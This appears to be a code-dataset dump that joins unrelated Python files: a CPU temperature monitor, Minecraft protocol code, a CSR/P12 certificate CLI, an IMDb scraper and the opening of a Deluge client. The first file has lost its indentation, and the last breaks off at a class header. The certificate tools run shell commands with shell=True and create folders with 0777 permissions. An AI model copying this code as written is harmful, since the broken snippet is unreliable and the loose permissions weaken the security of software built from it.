def _kill_workers(self):
while len(self._workers) > 0:
worker = self._workers.pop()
worker.kill()
def _get_cpu_count(self):
with open("/proc/cpuinfo") as f:
text = f.read()
text = text.split("\n")
cpu_cnt = 0
for line in text:
if line.startswith("processor"):
cpu_cnt += 1
return cpu_cnt
def start(self):
try:
with open("logfile.txt", "a") as f:
self._outfile = f
self._print_info()
self._t0 = time.time()
for threadcount in range(self._get_cpu_count() + 1):
self._monitor_seconds(self._CYCLE_DURATION_SECONDS)
self._outfile.flush()
self._spawn_worker()
self._kill_workers()
self._monitor_seconds(self._FINAL_DURATION_SECONDS)
finally:
self._kill_workers()
self._outfile = None
def _print_info(self):
print("# %s UTC, %d CPUs" % (datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), self._get_cpu_count()), file = self._outfile)
with open("/proc/cpuinfo") as f:
text = f.read()
text = text.split("\n")
for line in text:
if line == "":
break
print("# %s" % (line), file = self._outfile)
print(file = self._outfile)
temperatures = self._get_temperature()
print("# %d sensor inputs:" % (len(temperatures)), file = self._outfile)
for (sensor_id, (corename, temperature)) in enumerate(temperatures):
print("# Sensor %d: %s (initial %.2f)" % (sensor_id, corename, temperature), file = self._outfile)
def _get_temperature(self):
output = subprocess.check_output([ "sensors", "-u", self._sensorname ]).decode()
corename = None
temperatures = [ ]
for line in output.split("\n"):
if not line.startswith(" "):
corename = line.split(":")[0]
elif line.startswith(" ") and ("_input:" in line):
temperature = float(line.split(": ")[1])
temperatures.append((corename, temperature))
return temperatures
def _monitor_seconds(self, second_count):
for seconds in range(second_count):
t = time.time() - self._t0
temperature = self._get_temperature()
avg_temperature = sum(temp[1] for temp in temperature) / len(temperature)
max_temperature = max(temp[1] for temp in temperature)
temperature_str_display = " ".join("%5.1f" % (temp[1]) for temp in temperature)
temperature_str_log = " ".join("%.3f" % (temp[1]) for temp in temperature)
threadcount = len(self._workers)
print("%3.0f %2d Max %5.1f Avg %5.1f : %s" % (t, threadcount, max_temperature, avg_temperature, temperature_str_display))
print("%.0f %d %.3f %.3f %s" % (t, threadcount, max_temperature, avg_temperature, temperature_str_log), file = self._outfile)
time.sleep(1)
CPUMonitor(sys.argv[1]).start()
``` |
{
"source": "johndoe434/Podrum",
"score": 2
} |
#### File: Podrum/podrum/config.py
```python
import json
import os
class config:
def __init__(self, path: str) -> None:
self.path: str = os.path.abspath(path)
self.data: dict = {}
basename: str = os.path.basename(self.path)
        extension: str = basename.rsplit(".", 1)[-1].lower()
self.extension: str = extension
if not os.path.isfile(path):
self.save()
if extension == "json":
self.data: dict = json.load(open(path, "rt"))
def save(self) -> None:
if self.extension == "json":
json.dump(self.data, open(self.path, "wt"), indent = 4)
```
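The `config` class lazily creates the file on first use and currently only round-trips JSON. A short usage sketch (the path and key are hypothetical):

```python
# Hypothetical usage; only the "json" extension is actually handled.
conf = config("server.json")       # writes an empty server.json if it does not exist
conf.data["max-players"] = 20
conf.save()                        # dumps the dict back with indent=4
```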
#### File: mcbe/packet/start_game_packet.py
```python
from protocol.mcbe.mcbe_protocol_info import mcbe_protocol_info
from protocol.mcbe.packet.mcbe_packet import mcbe_packet
class start_game_packet(mcbe_packet):
def __init__(self, data: bytes = b"", pos: int = 0) -> None:
super().__init__(data, pos)
self.packet_id: int = mcbe_protocol_info.start_game_packet
def decode_payload(self):
pass
def encode_payload(self):
self.write_signed_var_long(self.entity_id)
self.write_var_long(self.entity_runtime_id)
self.write_gamemode(self.player_gamemode)
self.write_vector_3_float(self.spawn)
self.write_vector_2_float(self.rotation)
self.write_signed_var_int(self.seed)
self.write_short_le(self.spawn_biome_type)
self.write_string(self.custom_biome_name)
self.write_signed_var_int(self.dimension)
self.write_signed_var_int(self.generator)
self.write_gamemode(self.world_gamemode)
self.write_signed_var_int(self.difficulty)
self.write_block_coordinates(self.world_spawn)
self.write_byte(self.disable_achivements)
self.write_signed_var_int(self.time)
self.write_signed_var_int(self.edu_offer)
self.write_byte(self.edu_features)
self.write_string(self.edu_product_id)
self.write_float_le(self.rain_level)
self.write_float_le(self.lightning_level)
self.write_bool(self.confirmed_platform_locked)
self.write_bool(self.multiplayer_game)
self.write_bool(self.lan_broadcasting)
self.write_signed_var_int(self.xbox_live_broadcast_mode)
self.write_signed_var_int(self.platform_broadcast_mode)
self.write_bool(self.enable_commands)
self.write_bool(self.require_texture_pack)
self.write_game_rules(self.game_rules)
self.write_experiments(self.experiments)
self.write_bool(self.has_used_experiments)
self.write_bool(self.bonus_chest)
self.write_bool(self.start_map)
self.write_signed_var_int(self.permission_level)
self.write_int_le(self.chunk_tick_range)
self.write_bool(self.locked_behavior_pack)
self.write_bool(self.locked_texture_pack)
self.write_bool(self.from_locked_template)
self.write_bool(self.only_msa_gamer_tags)
self.write_bool(self.from_world_template)
self.write_bool(self.world_template_option_locked)
self.write_bool(self.only_old_villagers)
self.write_string(self.game_version)
self.write_int_le(self.limited_world_width)
self.write_int_le(self.limited_world_height)
self.write_bool(self.new_nether)
self.write_bool(self.experimental_gamplay)
self.write_string(self.level_id)
self.write_string(self.world_name)
self.write_string(self.premium_world_template_id)
self.write_bool(self.trial)
self.write_var_int(self.movement_type)
self.write_signed_var_int(self.movement_rewind_size)
self.write_bool(self.server_authoritative_block_breaking)
self.write_long_le(self.current_tick)
self.write_signed_var_int(self.enchantment_seed)
self.write_var_int(0) # block states length
self.write_var_int(len(self.item_table)) # item table length
for string_id, numeric_id in self.item_table.items():
self.write_string(string_id)
self.write_short_le(numeric_id)
self.write_bool(False)
self.write_string(self.multiplayer_correlation_id)
self.write_bool(self.server_authoritative_inventories)
``` |
{
"source": "johndoe-dev/CertGenerator",
"score": 2
} |
#### File: CertGenerator/certgenerator/cli.py
```python
import click
import json
import callbacks
import decorators
from certificate import Certificate
from tools import Tools, edit_config
tools = Tools()
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.option('-V', '--version', is_flag=True, callback=callbacks.print_version,
expose_value=False, is_eager=True, help="show version and exit")
def main():
"""
A command line tool to create and read CSR and P12
"""
if tools.get_config(section="custom"):
tools.set_options(custom=tools.get_config(section="custom"))
@main.command(short_help="init app")
@decorators.folder_options
@decorators.csv_options
def init(cert_folder, csv_file, yaml):
"""
\b
Create or edit certificate folder and csv file
Add yaml file if not exists (csr.yaml)
\f
:param cert_folder:
:param csv_file:
:param yaml:
:return:
"""
edit_config(cert_folder, csv_file, yaml)
@main.command()
@click.pass_context
@decorators.pass_logger
@click.argument('name', type=str, required=False)
@decorators.global_options("csr")
@decorators.debug_options
def create(logger, ctx, name, config, force, key_size, san, verbose, debug, **subject):
"""
Create a single CSR
\f
:param logger:
:param ctx:
:param name:
:param config:
:param force:
:param key_size:
:param san:
:param verbose:
:param debug:
:param subject:
:return:
"""
tools.set_options(ctx=ctx, config=config, san=san, size=key_size, subject=subject, verbose=verbose, debug=debug)
if name:
tools.set_options(name=str(name))
cert = Certificate(logger=logger, opts=tools.opts)
if 'subject' in tools.opts:
cert.load_subject()
cert.generate_csr(force=force)
@main.command(short_help="Create multiple CSR")
@click.pass_context
@decorators.pass_logger
@decorators.csv_options
@decorators.global_options("csr")
@decorators.debug_options
def create_multiple(logger, ctx, csv_file, config, force, key_size, san, verbose, debug, **subject):
"""
Create multiple certificate using csv file
\f
:param logger:
:param ctx:
:param csv_file:
:param config:
:param force:
:param key_size:
:param san:
:param verbose:
:param debug:
:param subject:
:return:
"""
tools.set_options(ctx=ctx, config=config, san=san, size=key_size, subject=subject, verbose=verbose, debug=debug)
cert = Certificate(logger=logger, opts=tools.opts)
if 'subject' in tools.opts:
cert.load_subject()
if csv_file:
cert.generate_multiple(csv_file=csv_file, force=force)
else:
cert.generate_multiple(force=force)
@main.command(short_help="Create one p12")
@click.pass_context
@decorators.pass_logger
@click.argument('name', type=str)
@click.option('-p', '--pem', type=str)
@click.option('-k', '--key', type=str)
@click.option('-pass', '--password', type=str, hide_input=True, help="Define password, default is '<PASSWORD>'",
default="<PASSWORD>")
@decorators.global_options("p12")
@decorators.debug_options
def create_p12(logger, ctx, name, pem, key, password, config, force, verbose, debug):
"""
\b
Create a simple p12
Need key file and pem file
\f
:param logger:
:param ctx:
:param name:
:param pem:
:param key:
:param password:
:param config:
:param force:
:param verbose:
:param debug:
:return:
"""
tools.set_options(ctx=ctx, config=config, verbose=verbose, debug=debug)
cert = Certificate(logger=logger, opts=tools.opts)
cert.generate_p12(key=key, pem=pem, p12=name, password=password, force=force)
@main.command(short_help="Create multiple p12")
@click.pass_context
@decorators.pass_logger
@decorators.csv_options
@click.option('-p', '--pem-folder', type=str, help="Define pem folder where all the pem are located")
@click.option('-k', '--key-folder', type=str,
help="Define key folder where all the key are located,"
" if not defined, it will search key in certificate folder")
@click.option('-pass', '--password', type=str, hide_input=True, help="Define password, default is '<PASSWORD>'",
default="<PASSWORD>")
@decorators.global_options("p12")
@decorators.debug_options
def create_multiple_p12(logger, ctx, csv_file, pem_folder, key_folder, password, config, force, verbose, debug):
"""
Create multiple p12 using csv file
\f
:param logger:
:param ctx:
:param csv_file:
:param pem_folder:
:param key_folder:
:param password:
:param config:
:param force:
:param verbose:
:param debug:
:return:
"""
tools.set_options(ctx=ctx, config=config, verbose=verbose, debug=debug)
cert = Certificate(logger, opts=tools.opts)
if csv_file:
cert.generate_multiple_p12(csv_file=csv_file, pem_folder=pem_folder,
key_folder=key_folder, password=password, force=force)
else:
cert.generate_multiple_p12(pem_folder=pem_folder, key_folder=key_folder, password=password, force=force)
@main.command()
@click.pass_context
@decorators.pass_logger
@click.argument("path", type=str)
@click.option('-pass', '--password', type=str, hide_input=True, help="password used for create p12")
@click.option('-t', '--plain-text', is_flag=True, help="Display certificate in plain text instead of json")
def read(logger, ctx, path, password, plain_text):
"""
Read csr or p12
\f
:param logger:
:param ctx:
:param path:
:param password:
:param plain_text:
:return:
"""
tools.set_options(ctx=ctx)
cert = Certificate(logger=logger, opts=tools.opts)
click.echo(cert.read(path=path, password=password, plain_text=plain_text))
"""
CONFIG SECTION:
- Read config ini
- edit config ini
"""
@main.group()
def config():
"""
Edit or read config ini
"""
@config.command()
def read():
"""read config ini
"""
app_folder = None
if tools.app_folder_exists():
app_folder = "\n\nApp folder : {p}\n".format(p=tools.app_folder)
list_yaml = json.dumps(tools.read_yaml(), indent=2)
else:
list_yaml = "Create app folder using \"cert init\" or \"cert config edit\" before read or edit yaml file"
click.echo("+++++config.ini+++++\n{c}".format(c=json.dumps(tools.config.get_all(), indent=2)))
if app_folder:
click.echo(app_folder)
click.echo("+++++csr.yaml+++++\n{y}".format(y=list_yaml))
@config.command(short_help="edit app config")
@decorators.folder_options
@decorators.csv_options
def edit(cert_folder, csv_file, yaml):
"""
\b
Create or edit certificate folder and csv file
Add yaml file if not exists (csr.yaml)
\f
:param cert_folder:
:param csv_file:
:param yaml:
:return:
"""
edit_config(cert_folder, csv_file, yaml)
@config.command()
def edit_yaml():
"""
Edit Yaml file
"""
tools.write_yaml()
@config.command(short_help="Delete options")
@click.option("-cert", "--cert-folder", is_flag=True, help="if flag, delete cert path folder from config ini")
@click.option("-csv", "--csv-file", is_flag=True, help="if flag, delete csvfile from config ini")
def delete(cert_folder, csv_file):
"""
Delete option from config ini (csr, p12 and csv path)
\f
:param cert_folder:
:param csv_file:
:return:
"""
_config = tools.get_config()
if not cert_folder and not csv_file:
_config.remove_section(section="custom")
with decorators.RemoveOption(config=_config, option=cert_folder) as o:
if o:
_config.remove_option(section="custom", option="app_folder")
with decorators.RemoveOption(config=_config, option=csv_file) as o:
if o:
_config.remove_option(section="custom", option="csvfile")
if __name__ == "__main__":
main()
```
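The CLI is organised as a `main` click group with a nested `config` group. A hypothetical way to exercise it without installing the console script is click's test runner; `"mycert"` is a placeholder CSR name and the extra options added by the custom decorators are omitted:

```python
# Sketch only; assumes the package is importable as "certgenerator".
from click.testing import CliRunner
from certgenerator.cli import main

runner = CliRunner()
runner.invoke(main, ["init"])               # create/select app folder, csv and csr.yaml
runner.invoke(main, ["create", "mycert"])   # generate a single CSR named "mycert"
result = runner.invoke(main, ["config", "read"])
print(result.output)
```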
#### File: CertGenerator/certgenerator/tools.py
```python
import os
import ruamel.yaml
import time
import csv
import logging
import logging.handlers
import click
import platform
import shutil
import subprocess
from codecs import open as c_open
from config import Config
from cert_exceptions import *
here = os.path.abspath(os.path.dirname(__file__))
yaml = ruamel.yaml.YAML()
def edit_config(cert_folder, csv_file, _yaml):
"""
add or edit app folder or/and csv_file or/and yaml
:param cert_folder:
:param csv_file:
:param _yaml:
:return:
"""
tools = Tools()
base_app_folder = tools.app_folder
base_csv_file = tools.config.default_csv_file
if cert_folder:
base_app_folder = cert_folder
try:
tools.add_custom_folder(base_app_folder, "app_folder")
except BadPathException as e:
tools.error(e)
except NoFolderException as e:
tools.error(e)
if csv_file:
base_csv_file = csv_file
else:
try:
base_csv_file = tools.get_config("custom")["csv"]
except KeyError:
pass
except TypeError:
pass
try:
tools.add_csv_file(base_csv_file, "csvfile", ext="csv")
except NoFileException as e:
tools.error(e)
except BadExtensionException as e:
tools.error(e)
if _yaml:
tools.write_yaml()
else:
try:
tools.add_config_file()
except NoFileException as e:
tools.error(e)
except BadExtensionException as e:
tools.error(e)
def get_subject():
fields = ["C", "CN", "ST", "L", "O", "OU", "emailAddress", "san"]
subject = {}
for field in fields:
res = validate_subject(field)
if res == "-" or res == "":
continue
subject[field] = res
return subject
def validate_subject(field):
"""
Validate subject
:param field:
:return:
"""
if field is "C":
c = str(click.prompt("Enter your Country Name (2 letter code) (put \"-\" to keep empty)",
default="US", show_default=True))
if c == "-":
return c
try:
if len(c) != 2:
raise ValueError(c)
else:
return c
except ValueError, e:
click.echo('Incorrect country name given , must be 2 letters code: {}'.format(e))
return validate_subject(field)
elif field is "CN":
return str(
click.prompt("Enter your Common Name (eg, DNS name) (put \"-\" to keep empty)",
default=platform.node(), show_default=True))
elif field is "ST":
return str(click.prompt("Enter your State or Province <full name> (put \"-\" to keep empty)",
default="France", show_default=True))
elif field is "L":
return str(click.prompt("Enter your (Locality Name (eg, city) (put \"-\" to keep empty)",
default="Paris", show_default=True))
elif field is "O":
return str(
click.prompt("Enter your Organization Name (eg, company) (put \"-\" to keep empty)",
default="Enterprise", show_default=True))
elif field is "OU":
return str(click.prompt("Enter your Organizational Unit (eg, section) (put \"-\" to keep empty)",
default="IT", show_default=True))
elif field is "emailAddress":
return str(click.prompt("Enter your email address (put \"-\" to keep empty)",
default="{<EMAIL>".format(n=platform.node()), show_default=True))
elif field is "san":
return str(click.prompt("Enter Subject Alt name (san) separate by space (ex: test.com test2.com ...)"
" (put \"-\" to keep empty)"))
class Tools:
def __init__(self):
self.here = here
self.basedir = os.path.dirname(self.here)
self.opts = Options()
self.config = Config()
self.about = self.get_app_info()
self.documents = os.path.join(os.environ["HOME"], "Documents")
self.app_folder = os.path.join(self.documents, self.get_app_info("__title__"))
self.csv_folder = os.path.join(self.app_folder, "csv")
self.yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
self.custom_section = "custom"
# Set cert folder
self.load_config()
@staticmethod
def get_app_info(item=None):
"""
Return app info
:param item:
:return:
"""
about = {}
with c_open(os.path.join(here, "__version__.py"), 'r', 'utf-8') as f:
exec (f.read(), about)
for i in about:
if "__long_description__" in i:
try:
about[i] = open(about[i]).read()
except IOError:
about[i] = ""
if item:
return about[item]
return about
def create_certificate_folder(self):
"""
Create path of certificate folder if not exist
:return:
"""
self.load_config()
self.makedir(self.app_folder)
def load_config(self):
"""
load custom app folder
:return:
"""
try:
if "app_folder" in self.config.get_section(self.custom_section):
self.app_folder = self.config.get(self.custom_section, "app_folder")
self.csv_folder = os.path.join(self.app_folder, "csv")
self.yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
except KeyError:
pass
except TypeError:
pass
def get_certificate_folder(self):
"""
Return path of certificate folder and created folder if not exist
:return:
"""
self.create_certificate_folder()
return self.app_folder
def logger_folder(self):
"""create logger folder"""
log = os.path.join(self.get_certificate_folder(), "log")
self.makedir(log)
return log
def get_logger(self):
"""
create and return logger
:return:
"""
default = self.get_config("default")
log_file = os.path.join(self.logger_folder(), default["log_file"])
try:
logger = logging.getLogger('certgen')
handler = logging.handlers.TimedRotatingFileHandler(log_file, when="midnight", backupCount=3)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.WARNING)
return logger
except AttributeError as err:
self.error("[!] Unable to open log file {f}: {e}\n".format(f=default["log_file"], e=err))
def get_config(self, section=None):
"""
Return Config
:param section:
:return:
"""
if section:
return self.config.get_section(section)
return self.config
def add_custom_folder(self, folder, option):
"""
Add custom folder in config ini
:param folder:
:param option:
:return:
"""
message = "App directory created: {p}".format(p=folder)
if os.path.exists(folder):
if os.path.isdir(folder):
self.config.add(self.custom_section, option, folder)
self.load_config()
message = "App directory selected: {p}".format(p=folder)
else:
raise NoFolderException("path: {p} is not a directory".format(p=folder))
else:
try:
self.makedir(folder)
self.config.add(self.custom_section, option, folder)
self.load_config()
except OSError:
self.error("Impossible to create app folder\n"
"Make sure you spell the path well: {p}".format(p=folder))
self.makedir(self.csv_folder)
click.echo(message)
def add_csv_file(self, _file, option=None, ext="csv"):
"""
Add csv file in config ini and add file in path folder
:param _file:
:param option:
:param ext:
:return:
"""
absolute = True
source = ""
destination = ""
message = ""
if len(_file.split("/")) == 1:
absolute = False
self.load_config()
if absolute:
if os.path.exists(_file) and os.path.isfile(_file):
if self.check_extension(_file, ext):
source = _file
destination = self.csv_folder
message = "copy {s} to {d}"\
.format(s=_file.split('/')[-1], d=os.path.join(self.csv_folder, _file.split('/')[-1]))
else:
raise NoFileException("path: {p} doesn't exist".format(p=_file))
else:
if self.check_extension(_file, ext):
source = self.config.default_csv_file
destination = os.path.join(self.csv_folder, _file.split("/")[-1])
message = "add csv: {f} in app directory: {p}"\
.format(f=_file.split("/")[-1], p=self.csv_folder)
try:
self.copy_file(source, destination, message)
except FileAlreadyExists as e:
click.echo("{e} => file selected".format(e=e))
if option:
self.config.add(self.custom_section, option, _file.split("/")[-1])
def add_config_file(self):
"""
Add config file in path folder
:return:
"""
try:
self.load_config()
source = self.config.yaml_file
destination = self.yaml_file
message = "add yaml: {f} in app directory: {p}".format(f=source.split('/')[-1], p=self.app_folder)
self.copy_file(self.config.yaml_file, destination, message=message)
except FileAlreadyExists as e:
click.echo("{e} => already added".format(e=e))
@staticmethod
def copy_file(source, destination, message=None):
"""
copy file
:param source:
:param destination:
:param message:
:return:
"""
if os.path.isfile(destination):
if not os.path.exists(destination):
pass
else:
raise FileAlreadyExists("file {p} already exists".format(p=destination))
else:
if not os.path.exists(os.path.join(destination, source.split("/")[-1])):
pass
else:
raise FileAlreadyExists("file {p} already exists"
.format(p=os.path.join(destination, source.split("/")[-1])))
shutil.copy2(source, destination)
if message:
click.echo(message)
def create_csv_file(self, _file):
"""
Create csv file
:param _file:
:return:
"""
csv_data = [["serial"], ["1234"]]
if not os.path.exists(_file):
with open(os.path.join(self.csv_folder, _file), 'w') as csv_file:
writer = csv.writer(csv_file)
writer.writerows(csv_data)
@staticmethod
def makedir(path):
"""
Create directory with all rights
:param path:
:return:
"""
if not os.path.exists(path):
os.mkdir(path)
os.chmod(path, 0777)
@staticmethod
def check_extension(_file, ext):
"""
check extension of given file
:param _file:
:param ext:
:return:
"""
file_name, file_ext = os.path.splitext(_file)
if ext in file_ext:
return True
raise BadExtensionException("file {f}: Extension {e} is expected, \"{g}\" given"
.format(f=_file, e=ext, g=file_ext))
def write_yaml(self):
"""
Write yaml in app folder
:return:
"""
yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
old_yaml = "{f}_{t}".format(f=yaml_file, t=time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time())))
if self.app_folder_exists():
if os.path.exists(yaml_file):
click.echo("\nRename {f} to {n_f}".format(f=yaml_file.split("/")[-1], n_f=old_yaml.split("/")[-1]))
os.rename(yaml_file, old_yaml)
click.echo("configure csr.yaml\n")
subject = get_subject()
with open(yaml_file, "w") as f:
yaml.dump(subject, f)
click.echo("\ncsr.yaml has been configured")
else:
self.error("app folder: {p} doesn't exist\nTry \"cert init\" or \"cert config edit\" to create app folder"
.format(p=self.app_folder))
def read_yaml(self):
"""
Read yaml file from app folder
:return:
"""
yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
if self.app_folder_exists():
if not os.path.exists(yaml_file):
self.add_config_file()
with open(yaml_file) as f:
yaml_conf = yaml.load(f)
return yaml_conf
else:
self.error("app folder: {p} doesn't exist\nTry \"cert init\" or \"cert config edit\" to create app folder"
.format(p=self.app_folder))
def app_folder_exists(self):
"""
Check is app folder path exists
:return:
"""
if os.path.exists(self.app_folder):
return True
return False
def get_options(self):
return self.opts
def set_options(self, **kwargs):
"""
edit or add items (key and value) to options
:param kwargs:
:return:
"""
for k, v in kwargs.items():
if "config" in k and v is True:
self.opts.update(config=self.get_config(section="config"))
continue
if "san" in k and v:
self.opts.update(san=[str(i) for i in v])
continue
if "size" in k and v:
self.opts.update(size=int(v))
continue
if k and v:
self.opts[k] = v
@staticmethod
def error(message):
click.echo("\n========ERROR========\n{m}\n========ERROR========\n".format(m=message))
raise click.Abort
@staticmethod
def shell(cmd, strip=True, silent=True):
"""
write and return result of shell cmd
:param cmd:
:param strip:
:param silent:
:return:
"""
if not silent:
            click.echo('> {}'.format(cmd))
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
if process.wait() == 0:
if strip:
return process.communicate()[0].rstrip()
return process.communicate()[0]
return ''
class Options(dict):
def __init__(self, *args, **kwargs):
super(Options, self).__init__(*args, **kwargs)
self.item_list = super(Options, self).keys()
def __setitem__(self, key, value):
self.item_list.append(key)
super(Options, self).__setitem__(key, value)
def __iter__(self):
return iter(self.item_list)
def keys(self):
return self.item_list
def values(self):
return [self[key] for key in self]
def itervalues(self):
return (self[key] for key in self)
if __name__ == '__main__':
t = Tools()
print t.about
``` |
{
"source": "JohnDoee/imdbparser",
"score": 3
} |
#### File: imdbparser/imdbparser/chart.py
```python
import re
import sys
from decimal import Decimal
from requests.compat import quote_plus
from .base import Base
from .movie import Movie
class Chart(Base):
base_url = "https://www.imdb.com/chart/%s"
def __init__(self, chart, imdb):
self.chart = chart
self.imdb = imdb
def _get_urls(self):
return [self.base_url % (self.chart,)]
def parse(self, htmls):
super(Chart, self).parse(htmls)
self.results = []
for item_row in self.trees[0].xpath("//tbody[@class='lister-list']/tr"):
poster_column = item_row.xpath(".//td[@class='posterColumn']")[0]
cover = poster_column.xpath(".//img/@src")[0]
if "/nopicture/" in cover:
cover = None
else:
cover = self.cleanup_photo_url(cover)
imdb_id = re.findall(r"/tt(\d+)/", poster_column.xpath(".//a/@href")[0])[0]
rating_text = item_row.xpath(
".//td[contains(@class, 'imdbRating')]/strong/@title"
)
            if rating_text:
                rating, votes = re.findall("[0-9.,]+", rating_text[0])
                rating = Decimal(rating)
                votes = int(votes.replace(",", ""))
            else:
                # Entries without a rating keep None instead of leaking values
                # from the previous loop iteration.
                rating, votes = None, None
year = None
for base_element in item_row.xpath(
".//td[@class='titleColumn']//span[@class='secondaryInfo']/text()"
):
years = re.findall(r"\((\d{4})\)", base_element)
if years:
year = int(years[0])
break
item = Movie(imdb_id, self.imdb)
item.title = item_row.xpath(".//td[@class='titleColumn']//a/text()")[0]
item.year = year
item.cover = cover
item.rating = rating
item.votes = votes
self.results.append(item)
```
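`Chart` builds its URL from a chart name and returns each row as a partially populated `Movie`. Driven through the `IMDb` facade the same way `__main__.py` below does, usage would look roughly like this; `"top"` is assumed to be one of the supported `CHART_TYPES`:

```python
# Sketch based on how __main__.py drives the library.
from imdbparser.imdb import IMDb

imdb = IMDb()
chart = imdb.get_chart("top")
chart.fetch()
for movie in chart.results:
    print(movie.title, movie.year, movie.rating, movie.votes)
```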
#### File: imdbparser/imdbparser/generateadvancedsearchresult.py
```python
import re
from .advancedsearchresult import Option
def enumify(text):
text = re.sub("[ -.]+", "_", text)
text = re.sub(r"[^a-zA-Z0-9_]+", "", text)
text = text.strip("_")
if text.startswith("20th"):
text = "twentieth" + text[4:]
return text.lstrip("012345679").upper()
def generate_function_and_enums(tree):
enums = {}
all_fields = []
for section in tree.xpath("//div[@class='clause']"):
section_title = section.xpath(".//h3/text()")[0]
if (
section_title == "Instant Watch Options"
): # bugged and not all that interesting
continue
if section_title == "Cast/Crew": # Skipped for now
continue
if section_title == "Display Options": # sorting option, not part of the form
continue
input_fields = section.xpath(".//input")
input_field_names = section.xpath(".//input/@name")
select_fields = section.xpath(".//select")
select_field_names = section.xpath(".//select/@name")
is_min_max = (
any(f for f in input_field_names if f.endswith("-min"))
and any(f for f in input_field_names if f.endswith("-max"))
or any(f for f in select_field_names if f.endswith("-min"))
and any(f for f in select_field_names if f.endswith("-max"))
)
if len(input_fields) == 1 and len(select_fields) == 0:
all_fields.append((input_field_names[0], "normal", ""))
elif len(set(input_field_names)) == 1 and len(select_fields) == 0:
field_name = input_field_names[0]
all_fields.append((field_name, "enum", []))
for e in input_fields:
label = section.xpath(f".//label[@for='{e.attrib['id']}']")[0]
if label.text:
label = label.text
else:
label = label.xpath(".//*/@title")[0]
value = e.attrib["value"]
enums.setdefault(enumify(field_name), {})[enumify(label)] = Option(
label, value
)
elif len(select_fields) == 1 and len(input_fields) == 0:
field_name = select_field_names[0]
all_fields.append((field_name, "enum", []))
for field in select_fields[0].xpath(".//option"):
label = field.text
value = field.attrib["value"]
enums.setdefault(enumify(field_name), {})[enumify(label)] = Option(
label, value
)
elif is_min_max:
if select_field_names:
field_name = select_field_names[0][:-4]
else:
field_name = input_field_names[0][:-4]
all_fields.append((field_name, "minmax", ("", "")))
else:
print("Unknown", section_title, input_fields, select_fields)
code = []
code.append("class AS:")
for k, v in enums.items():
code.append(f" class {k}:")
for label, option in v.items():
code.append(f" {label} = {option!r}")
code.append("")
code.append("")
func_args = ", ".join([f"{fn}={v!r}" for (fn, t, v) in all_fields])
code.append("class AdvancedSearchResult(ParseBase):")
code.append(f" def __init__(self, imdb, {func_args}):")
code.append(" self.imdb = imdb")
code.append("")
code.append(" self.query = {}")
for fn, t, v in all_fields:
if t == "normal":
code.append(f" self.query['{fn}'] = {fn}")
elif t == "enum":
code.append(
f" self.query['{fn}'] = ','.join([isinstance(v, str) and v or v.value for v in {fn}])"
)
elif t == "minmax":
code.append(f" self.query['{fn}-min'] = {fn}[0]")
code.append(f" self.query['{fn}-max'] = {fn}[1]")
return "\n".join(code)
```
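`generate_function_and_enums` walks the advanced-search form markup and emits the source for an `AS` enum namespace plus an `AdvancedSearchResult` constructor. A sketch of driving it; `requests`/`lxml` and the search URL are assumptions, and the function only needs an element tree containing the form's `div.clause` sections:

```python
# Assumed driver; requests and lxml are not imported by the module itself.
import requests
from lxml import html

tree = html.fromstring(requests.get("https://www.imdb.com/search/title/").content)
print(generate_function_and_enums(tree))  # output is code meant to be pasted into a module
```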
#### File: imdbparser/imdbparser/__main__.py
```python
import argparse
import logging
from pprint import pprint
def main():
from .imdb import IMDb, CHART_TYPES, AS
parser = argparse.ArgumentParser(description="Fetch info from IMDb")
parser.add_argument("--debug", help="Enable debugging", action="store_true")
subparsers = parser.add_subparsers(help="sub-command help", dest="command")
fetch_parser = subparsers.add_parser(name="fetch")
fetch_parser.add_argument("imdb_id", help="an IMDb id, e.g. tt0120737")
search_parser = subparsers.add_parser(
name="search", description="Search for a movie or tv show"
)
search_parser.add_argument(
"type", help="Type to search for", choices=["tv", "movie"]
)
search_parser.add_argument("title", help="Title to search for")
resolve_parser = subparsers.add_parser(
name="resolve", description="Try to resolve a search into a specific entry"
)
resolve_parser.add_argument(
"type", help="Type to search-resolve for", choices=["tv", "movie"]
)
resolve_parser.add_argument("title", help="Title to search-resolve for")
resolve_parser.add_argument(
"year", help="Year close to the entry", type=int, nargs="?"
)
chart_parser = subparsers.add_parser(name="chart", description="Fetch a chart")
chart_parser.add_argument("type", help="Chart type", choices=CHART_TYPES)
args = parser.parse_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG)
i = IMDb()
movie = None
movies = None
if args.command == "fetch":
movie = i.get_movie(args.imdb_id.lstrip("tt"))
elif args.command == "search":
if args.type == "tv":
movies = i.search_tv_show(args.title)
elif args.type == "movie":
movies = i.search_movie(args.title)
elif args.command == "resolve":
if args.type == "tv":
movie = i.resolve_tv_show(args.title, args.year)
elif args.type == "movie":
movie = i.resolve_movie(args.title, args.year)
elif args.command == "chart":
movies = i.get_chart(args.type)
else:
parser.print_help()
if movie is not None:
movie.fetch()
pprint(movie.__dict__)
print("")
print("More like this")
for recommended_movie in movie.more_like_this:
pprint(recommended_movie.__dict__)
if movies is not None:
movies.fetch()
if movies.results:
for movie in movies.results:
print(movie)
print(movie.__dict__)
else:
print("Nothing found...")
if __name__ == "__main__":
main()
```
#### File: imdbparser/imdbparser/person.py
```python
from .base import Base
class Person(Base):
name = None
base_url = "http://www.imdb.com/name/nm%s/"
def parse(self, html):
super(Person, self).parse(html)
def __repr__(self):
return "<Person fetched=%r imdb_id=%r name=%r>" % (
self.fetched,
self.imdb_id,
self.name,
)
``` |
{
"source": "JohnDoee/libtc",
"score": 2
} |
#### File: libtc/clients/deluge.py
```python
import base64
import hashlib
from datetime import datetime
from pathlib import Path
from urllib.parse import urlencode
import pytz
from deluge_client import DelugeRPCClient, LocalDelugeRPCClient
from deluge_client.client import DelugeClientException
from ..baseclient import BaseClient
from ..bencode import bencode
from ..exceptions import FailedToExecuteException
from ..torrent import TorrentData, TorrentFile, TorrentState
from ..utils import (
calculate_minimum_expected_data,
has_minimum_expected_data,
map_existing_files,
)
class DelugeClient(BaseClient):
